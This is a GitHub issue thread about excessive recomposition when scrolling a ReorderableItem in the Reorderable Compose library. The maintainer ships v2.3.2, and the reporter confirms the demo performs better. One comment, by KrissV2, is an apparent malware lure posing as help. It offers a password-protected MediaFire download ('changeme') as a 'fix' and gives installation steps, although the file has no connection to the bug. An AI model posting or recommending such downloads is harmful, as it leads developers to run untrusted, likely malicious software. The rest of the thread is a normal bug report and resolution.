### ISSUE TITLE
Constant recomposing

### ISSUE THREAD

**Issue by fergdev** [Calvin-LL/Reorderable#47]
When scrolling using the second example (Complete Example (with haptic feedback)) in README.md the ReorderableItem and ReorderableItemScope constantly recomposes. Is this expected behaviour?

Removing the ReorderableItem returns recomposition to standard behaviour.

This is impacting performance on a few screens of mine.

https://github.com/user-attachments/assets/500fba67-c1bd-42b6-a899-5e8e69f25441

Thanks, love the library, hope to keep using it.

**Comment by Calvin-LL** [comment]
Oh I'll take a look tomorrow PST

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Calvin-LL** [comment]
try [v2.3.2](https://github.com/Calvin-LL/Reorderable/releases/tag/v2.3.2)

**Comment by fergdev** [comment]
Much better performance on the demo :) thanks for that. Now I just have to figure out why my list is slow. I'll raise another bug if I get a simple example.
